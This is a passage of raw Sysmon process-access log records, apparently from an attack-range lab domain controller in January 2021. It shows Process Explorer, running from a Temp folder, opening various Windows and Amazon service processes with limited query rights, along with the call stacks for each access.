ELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789154Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789153Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789152Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789151Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789150Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789149Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789148Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789147Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789146Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789145Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789144Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789143Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789142Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789141Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789140Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789139Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789138Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:31.142{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789137Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 